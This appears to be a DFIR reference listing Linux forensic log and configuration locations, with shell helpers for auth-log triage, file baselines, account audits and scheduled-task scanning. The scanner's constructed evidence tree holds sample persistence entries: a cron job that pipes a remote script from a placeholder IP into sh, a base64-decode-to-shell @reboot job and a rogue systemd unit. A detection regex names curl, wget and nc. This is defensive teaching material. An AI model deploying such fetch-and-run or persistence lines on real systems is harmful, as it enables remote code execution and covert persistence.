DFIR-Notes

Linux Forensics Logs

Linux logs are a primary source of evidence during threat hunting and incident response. The main locations are listed below. Exact paths differ between Debian-based and Red Hat-based distributions, and on systemd hosts many of these messages also (or only) land in the journal, so check journalctl alongside the files.

1. System Logs

/var/log/syslog (Debian-based systems): General system messages from rsyslog, including service start-up.
/var/log/messages (Red Hat-based systems): General-purpose system log containing kernel and application messages.
/var/log/dmesg: Kernel ring buffer as captured at boot; `dmesg` shows the live ring buffer, which does not survive a reboot. Many systemd distributions no longer write this file, so use `journalctl -k` instead.
/var/log/journal/: Persistent systemd journal (binary; read with journalctl). If the directory is absent, journald is running with volatile storage and history from earlier boots is already gone.

2. Authentication and Access Logs

/var/log/auth.log (Debian-based systems): Authentication activity: logins, SSH, sudo, su and PAM events.
/var/log/secure (Red Hat-based systems): Equivalent to auth.log.
/var/log/faillog: Binary per-user failed-login counters; read with `faillog -a`. Often empty on modern systems, where pam_faillock keeps its counters under /var/run/faillock/ instead.
/var/log/lastlog: Binary table of the last login per user; read with `lastlog`. A missing entry is not proof that an account never logged in, since not every login path updates it.
/var/log/wtmp, /var/log/btmp and /var/run/utmp: Binary session records: wtmp for logins, logouts and reboots (`last`), btmp for failed logins (`lastb`), utmp for sessions currently open (`who`, `w`). Use `last -f <file>` to read a copy pulled from an image, and cross-check against auth.log, because these files are trivial to truncate or edit.
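
As an added example (not part of the original notes), the shell functions below run the three checks an analyst usually starts with over auth.log: failed SSH attempts per source, sources that eventually succeeded after repeated failures, and who ran what through sudo. The log excerpt is constructed for this example; the host name, addresses and user names are placeholders.

```shell
#!/bin/sh
# Constructed auth.log excerpt for the example (not from a real host).
AUTH_FILE=$(mktemp)
cat > "$AUTH_FILE" <<'EOF'
Mar  3 10:01:12 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar  3 10:01:15 web01 sshd[2213]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Mar  3 10:01:19 web01 sshd[2215]: Failed password for root from 203.0.113.7 port 51041 ssh2
Mar  3 10:01:23 web01 sshd[2217]: Accepted password for root from 203.0.113.7 port 51055 ssh2
Mar  3 10:02:40 web01 sshd[2230]: Accepted publickey for deploy from 198.51.100.4 port 40022 ssh2: ED25519 SHA256:4m3xQ
Mar  3 10:03:01 web01 sudo:     root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/tar czf /tmp/etc.tgz /etc
Mar  3 10:05:44 web01 sshd[2250]: Failed password for deploy from 192.0.2.9 port 33001 ssh2
EOF

# Failed SSH authentications per source address, most frequent first ("count ip").
failed_by_source() {
    awk '/sshd\[[0-9]+\]: Failed (password|publickey) for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") ip[$(i + 1)]++
         }
         END { for (a in ip) print ip[a], a }' "$1" | sort -rn
}

# Sources that logged in after at least $2 failures: a password guess that worked.
# Output: "ip user failures_before_success". Field 6 is Failed/Accepted because
# the syslog prefix (month day time host tag) always occupies fields 1-5.
accepted_after_failures() {
    awk -v min="$2" '
        /sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey) for/ {
            for (i = 1; i <= NF; i++) {
                if ($i == "for")  user = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
                if ($i == "from") ip = $(i + 1)
            }
            if ($6 == "Failed") fails[ip]++
            else if (fails[ip] + 0 >= min + 0) print ip, user, fails[ip]
        }' "$1"
}

# Who ran what through sudo ("user command"); sudo logs here unless
# "Defaults logfile=" in sudoers redirects it to its own file.
sudo_commands() {
    sed -n 's/.* sudo: *\([^ ]*\) : .*COMMAND=\(.*\)/\1 \2/p' "$1"
}

echo "== failed logins by source";    failed_by_source "$AUTH_FILE"
echo "== success after >=2 failures"; accepted_after_failures "$AUTH_FILE" 2
echo "== sudo commands";              sudo_commands "$AUTH_FILE"
```

On a live host point the functions at /var/log/auth.log or /var/log/secure, or read the journal instead, for example `journalctl -t sshd -t sudo --no-pager | failed_by_source /dev/stdin`; the journal's short format keeps the same field positions, so the awk logic is unchanged.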

3. Process and Task Monitoring

/var/log/cron (Red Hat-based systems): Cron job execution. Debian-based systems send cron messages to /var/log/syslog (facility cron) or the journal instead.
/var/log/atop/: Binary daily samples written by the atop daemon (atop_YYYYMMDD); replay with `atop -r <file>`. If atop was installed, this reconstructs which processes were running, and with what resource usage, at a given time.
/proc/: Volatile runtime state, including per-process details under /proc/<PID> (cmdline, exe, cwd, environ, fd/). Only available on a live system, so collect it before powering off.

4. Network Logs

/var/log/ufw.log: Block and allow messages from the Uncomplicated Firewall (UFW).
/var/log/firewalld: firewalld daemon log.
/var/log/iptables.log (if configured): Rule hits from the iptables/nftables LOG target. Without an rsyslog rule to split them out, these messages go to kern.log, messages or the journal.
/var/log/suricata/ or /var/log/snort/: IDS/IPS output (if installed); Suricata writes alerts to fast.log and eve.json in that directory.
/var/log/audit/audit.log: auditd event log, including SELinux AVC denials and any network-related syscalls covered by the loaded audit rules.
/var/log/maillog or /var/log/mail.log: Mail server logs, useful for spotting phishing or malware campaigns.
/etc/hosts: Maps hostnames to IP addresses; look for entries that redirect update servers or security vendor domains.
/etc/resolv.conf: Configures DNS servers; an unexpected resolver can indicate DNS hijacking.
/etc/network/: Networking configuration (ifupdown on Debian-based systems).
/etc/ufw/: Firewall configuration.
/etc/hosts.allow and /etc/hosts.deny: TCP Wrappers access control for network services.

5. Application and Service Logs

/var/log/apache2/ (Debian-based) or /var/log/httpd/ (Red Hat-based): Apache access and error logs.
/var/log/apache2/access.log: One line per request; review for web shell access, scanner user agents and unusual status-code patterns.
/var/log/nginx/: NGINX access and error logs.
/var/log/mysql/: MySQL/MariaDB logs (Debian-based systems).
/var/log/postgresql/: PostgreSQL logs.
/var/log/docker.log: Docker daemon log on hosts without systemd; on systemd hosts the daemon logs to the journal (`journalctl -u docker`).
/var/lib/docker/containers/<id>/<id>-json.log: Per-container stdout/stderr when the default json-file logging driver is in use.

6. User Activity Monitoring

~/.bash_history: Command history per user. It is written only when the shell exits cleanly, carries no timestamps unless HISTTIMEFORMAT is set, and is trivially cleared or disabled (HISTFILE=/dev/null, unset HISTFILE), so an absent or empty history is itself a finding. Check root's history and the home directories of service accounts as well.
~/.zsh_history: Same for Zsh; also look at ~/.python_history, ~/.mysql_history, ~/.lesshst and ~/.viminfo, and at ~/.ssh/known_hosts for hosts the user connected to.
/var/log/sudo.log: Only present when sudoers sets `Defaults logfile=`; otherwise sudo logs through syslog into auth.log or secure.
/var/log/user.log: Messages logged with the user facility (Debian-based rsyslog default).

7. File Integrity and Change Monitoring

/var/log/audit/audit.log: auditd events for file access and system changes when watch rules (for example `-w /etc/passwd -p wa`) are loaded; query with `ausearch` and summarise with `aureport`.
/var/log/tripwire/report/ (if installed): Tripwire integrity reports; the actual location is set by REPORTFILE in twcfg.txt, so check the configuration rather than assuming the path.
AIDE (if installed): /var/log/aide/aide.log on Debian-based systems, with the trusted database under /var/lib/aide/.
inotify: There is no standard inotify log. The kernel API writes nothing on its own; tools built on it (incron, inotifywait) log wherever they were configured to.
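
When no integrity monitor was installed before the incident, the fallback is to fingerprint a tree with sha256sum and diff it against a baseline taken from a known-good copy or a package mirror. The helpers below are an added example, not the notes' own tooling; the directory layout and file contents are constructed inside a temporary directory, and the baseline format ("hash  ./relative/path") is the plain sha256sum output.

```shell
#!/bin/sh
# Baseline format: "<sha256>  ./relative/path", one line per regular file.
# Paths containing whitespace are not handled (they would split in awk).

make_baseline() {                      # $1 = directory to fingerprint
    (cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k 2)
}

# Compare a directory against a stored (non-empty) baseline and print one
# line per difference: ADDED / MODIFIED / DELETED <path>. Prints nothing when clean.
check_baseline() {                     # $1 = directory, $2 = baseline file
    make_baseline "$1" | awk '
        NR == FNR { base[$2] = $1; next }        # first input: the baseline
        { cur[$2] = $1 }                         # stdin: the live tree
        END {
            for (p in base)
                if (!(p in cur))            print "DELETED", p
                else if (base[p] != cur[p]) print "MODIFIED", p
            for (p in cur)
                if (!(p in base))           print "ADDED", p
        }' "$2" - | LC_ALL=C sort
}

# Constructed scenario: fingerprint a small web root while it is trusted,
# then change it the way a dropped file and an edited page would, and check.
demo_report() {
    tree=$(mktemp -d); base=$(mktemp)
    mkdir -p "$tree/conf"
    printf 'PermitRootLogin no\n' > "$tree/conf/sshd_config"
    printf '<?php echo "hello"; ?>\n' > "$tree/index.php"
    make_baseline "$tree" > "$base"                     # baseline taken now
    printf 'placeholder dropped file\n' > "$tree/conf/.cache.php"   # new file
    printf '<?php include "conf/.cache.php"; ?>\n' >> "$tree/index.php"  # changed file
    check_baseline "$tree" "$base"
    rm -rf "$tree" "$base"
}

demo_report
```

Store the baseline off the host (or on write-once media); a baseline kept next to the files it protects is the first thing an attacker with root will regenerate. Hashes catch content changes only, so pair this with `stat` on owner, mode and timestamps, and with `dpkg -V` / `rpm -Va` for files that belong to packages.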

8. System and Package Updates

/var/log/apt/history.log and /var/log/apt/term.log (Debian-based systems): Package installs and removals, with the full command line in history.log and the terminal output in term.log. /var/log/dpkg.log records every dpkg action, including packages installed by hand with dpkg -i.
/var/log/yum.log, or /var/log/dnf.log and /var/log/dnf.rpm.log (Red Hat-based systems): Package transactions; `dnf history` reads the same data from the transaction database.
/var/log/samba/: Samba file-sharing logs (log.smbd, log.nmbd and per-client log.<host> files); use them to track unauthorized access to shared resources.
NFS: There is no dedicated NFS log file by default; the kernel NFS server and rpc.mountd log via syslog to /var/log/messages, /var/log/syslog or the journal. The export configuration is in /etc/exports.

9. Boot and Initialization Logs

/var/log/boot.log: Console messages from the boot sequence.
/var/log/kern.log (Debian-based systems): Kernel messages during boot and operation; Red Hat-based systems put these in /var/log/messages. With a persistent journal, `journalctl -b -1 -k` shows the kernel log of the previous boot.

10. Miscellaneous Logs

/var/log/Xorg.0.log: X server (GUI) log.
/var/log/cloud-init.log and /var/log/cloud-init-output.log: Cloud instance initialization, including the output of the user-data script that ran at first boot; a modified user-data script is a persistence vector worth checking.
/var/log/rkhunter.log: Rootkit Hunter scan results (if installed).

11. Cron Jobs and Task Scheduling

/etc/crontab, /etc/cron.d/ and /etc/cron.{hourly,daily,weekly,monthly}/: System-wide cron configuration. These are job definitions, not logs (execution is recorded in /var/log/cron or syslog); review them for unauthorized or suspicious jobs.
/var/spool/cron/crontabs/ (Debian-based) or /var/spool/cron/ (Red Hat-based): Per-user crontabs, one file per user. Also check /etc/anacrontab and /var/spool/at/ for at jobs.
/etc/systemd/system/, /lib/systemd/system/ and ~/.config/systemd/user/: Unit files. An unfamiliar unit such as a persistence.service, or a .timer unit, is a common persistence mechanism; on a live system `systemctl list-timers --all` and `systemctl list-unit-files --state=enabled` enumerate them.
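
As an added example (not the notes' own tooling), the functions below walk the scheduling locations listed above under a root directory, so the same code works on a live system (root "/") or on a mounted evidence image, and flag entries with the classic download-and-pipe-to-shell, decode-a-blob or staging-directory patterns. The tree is constructed inside a temporary directory; the unit name persistence.service, the address, the file names and the job contents are placeholders.

```shell
#!/bin/sh
# Scheduled-task locations, relative to the root being examined ("/" on a
# live host, or the mount point of an evidence image).
CRON_FILES='etc/crontab etc/cron.d/* var/spool/cron/crontabs/* var/spool/cron/*'
UNIT_DIRS='etc/systemd/system usr/lib/systemd/system lib/systemd/system'

# Print every active cron line as "<path>: <line>", dropping blank lines,
# comments and VAR=value assignments. $1 = root directory.
list_cron_entries() {
    for rel in $CRON_FILES; do
        for f in "$1"/$rel; do
            [ -f "$f" ] || continue
            grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$f" | sed "s|^|${f#"$1"}: |"
        done
    done
}

# Print the Exec*/OnCalendar/OnBoot* lines of every service and timer unit.
list_unit_exec() {
    for d in $UNIT_DIRS; do
        for f in "$1"/$d/*.service "$1"/$d/*.timer; do
            [ -f "$f" ] || continue
            grep -E '^(Exec|OnCalendar|OnBoot)' "$f" | sed "s|^|${f#"$1"}: |"
        done
    done
}

# Patterns worth a second look: fetch-and-run, decoding embedded blobs,
# inline interpreters, or binaries living in world-writable staging dirs.
SUSPICIOUS='curl|wget|base64 -d|/tmp/|/var/tmp/|/dev/shm|[|] *(ba)?sh|python[23]? -c|nc -'
flag_suspicious() {
    { list_cron_entries "$1"; list_unit_exec "$1"; } | grep -E "$SUSPICIOUS"
}

# Constructed evidence tree for the example; paths and contents are placeholders.
build_sample_root() {
    r=$(mktemp -d)
    mkdir -p "$r/etc/cron.d" "$r/var/spool/cron/crontabs" "$r/etc/systemd/system"
    printf 'SHELL=/bin/sh\n# m h dom mon dow user command\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\n' > "$r/etc/crontab"
    printf '*/5 * * * * root curl -s http://203.0.113.7/u.sh | sh\n' > "$r/etc/cron.d/sysupdate"
    printf '@reboot /bin/sh -c "echo ZWNobyBoaQ== | base64 -d | sh"\n' > "$r/var/spool/cron/crontabs/www-data"
    printf '[Unit]\nDescription=System helper\n[Service]\nExecStart=/dev/shm/.x/agent\n[Install]\nWantedBy=multi-user.target\n' > "$r/etc/systemd/system/persistence.service"
    echo "$r"
}

ROOT=$(build_sample_root)
echo "== all cron entries"; list_cron_entries "$ROOT"
echo "== suspicious";       flag_suspicious "$ROOT"
```

The pattern list is deliberately noisy (a legitimate backup job that writes to /tmp/ will trigger it); the point is to shrink a few hundred lines to the handful that need eyes. Run `list_cron_entries /` and `list_unit_exec /` in full as well, since a job named like a system task but pointing at an unpackaged binary matches nothing above.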

12. Mail and Communication

/var/log/mail.log (Debian-based) or /var/log/maillog (Red Hat-based): Incoming and outgoing mail. Look for spam bursts, unexpected relaying, and large or unusually timed outbound messages that could indicate data exfiltration.

13. Cloud and Remote Management Logs

/etc/ssh/sshd_config (and /etc/ssh/sshd_config.d/ where Include is used): Server settings; check PermitRootLogin, PasswordAuthentication, AuthorizedKeysFile and any AllowUsers or Match blocks.
~/.ssh/authorized_keys: Per-user trusted public keys (the location can be changed with AuthorizedKeysFile in sshd_config). An added key is one of the simplest persistence mechanisms, so review root's file and every home directory, plus ~/.ssh/known_hosts and ~/.ssh/config for signs of lateral movement.
~/.aws/credentials, ~/.aws/config and ~/.aws/cli/cache/: Long-term keys, profiles and cached temporary credentials for the AWS CLI; look for keys that were added or used during the incident window.

14. User credentials

/usr/bin/passwd: The setuid binary that changes passwords; verify it against its package (`dpkg -V passwd` or `rpm -Vf /usr/bin/passwd`), since trojaned setuid binaries are a known rootkit technique.
/etc/passwd: All accounts. Look for a second UID 0 account, service accounts with an unexpected login shell, and home directories in odd locations.
/etc/shadow: Password hashes and aging fields. An empty second field means no password is required; the third field (days since 1970-01-01) shows when the password was last changed.
/etc/group: Group memberships; check who is in sudo, wheel, docker, adm and shadow.
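
The checks above reduce to a few awk one-liners over /etc/passwd and /etc/shadow. The block below is an added example, not part of the original notes; the two files are constructed excerpts with placeholder hashes, and the UID_MIN of 1000 is the login.defs default, which older installs may set lower.

```shell
#!/bin/sh
# Constructed /etc/passwd and /etc/shadow excerpts (hashes are placeholders).
PASSWD_FILE=$(mktemp); SHADOW_FILE=$(mktemp)
cat > "$PASSWD_FILE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/bash
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/root:/bin/bash
EOF
cat > "$SHADOW_FILE" <<'EOF'
root:$6$placeholder$hash1:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
www-data:*:19700:0:99999:7:::
backup::19700:0:99999:7:::
sshd:*:19700:0:99999:7:::
alice:$6$placeholder$hash2:19700:0:99999:7:::
toor:$6$placeholder$hash3:19800:0:99999:7:::
ghost:!:19700:0:99999:7:::
EOF

# UID 0 accounts other than root: any hit is a finding.
extra_uid0() { awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"; }

# Accounts with an empty password field: login without a password.
empty_passwords() { awk -F: '$2 == "" { print $1 }' "$1"; }

# System accounts (UID below UID_MIN, 1000 by default in login.defs) that
# have a login shell instead of nologin/false. $2 overrides UID_MIN.
service_accounts_with_shell() {
    awk -F: -v max="${2:-1000}" '$3 > 0 && $3 < max && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# Accounts whose password changed on or after day $2 (days since 1970-01-01;
# today's value is `expr $(date +%s) / 86400`). Pair with the incident window.
changed_since() { awk -F: -v day="$2" '$3 + 0 >= day + 0 { print $1 }' "$1"; }

# Names present in the second file but missing from the first: passwd and
# shadow drifting apart is a sign of hand editing rather than useradd.
unmatched_accounts() {
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print $1 }' "$1" "$2"
}

echo "== extra UID 0";             extra_uid0 "$PASSWD_FILE"
echo "== empty password";          empty_passwords "$SHADOW_FILE"
echo "== service acct with shell"; service_accounts_with_shell "$PASSWD_FILE"
echo "== changed since day 19750"; changed_since "$SHADOW_FILE" 19750
echo "== in shadow, not passwd";   unmatched_accounts "$PASSWD_FILE" "$SHADOW_FILE"
```

Run the same functions against the files copied out of an image rather than the live ones when possible, and compare against /etc/passwd- and /etc/shadow- (the backup copies useradd and passwd leave behind), which often still show the state before an account was added or a hash replaced.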

15. Security Policies and Controls

/etc/sudoers and /etc/sudoers.d/: sudo permissions. Check for NOPASSWD entries, ALL=(ALL) grants to service accounts and recently modified drop-in files; on a live system `sudo -l -U <user>` shows a user's effective rights.

16. Investigate Time Adjustments

grep -i ntp /var/log/syslog : ntpd messages show the synchronization history; "time reset" lines mark step corrections.
grep "time correction" /var/log/syslog
journalctl -u chronyd, journalctl -u systemd-timesyncd and timedatectl : the equivalents on hosts running chrony or systemd-timesyncd; chrony reports large steps as "System clock wrong by N seconds".
A large step means log timestamps on either side of it cannot be compared directly. Before building a timeline, also record the system timezone (/etc/localtime) and whether the hardware clock is kept in UTC or local time.

17. Database Logs - tracks database activities, errors, and slow queries

/var/log/mysql/error.log (Debian-based), /var/log/mysqld.log or /var/log/mariadb/mariadb.log (Red Hat-based): Server errors, restarts and failed connections. The general and slow query logs are off by default; their paths are set by general_log_file and slow_query_log_file.
/var/log/postgresql/postgresql-<version>-main.log (Debian-based; the file name carries the major version): Connections, errors and, if log_statement is enabled, the executed statements.


Last updated 5 months ago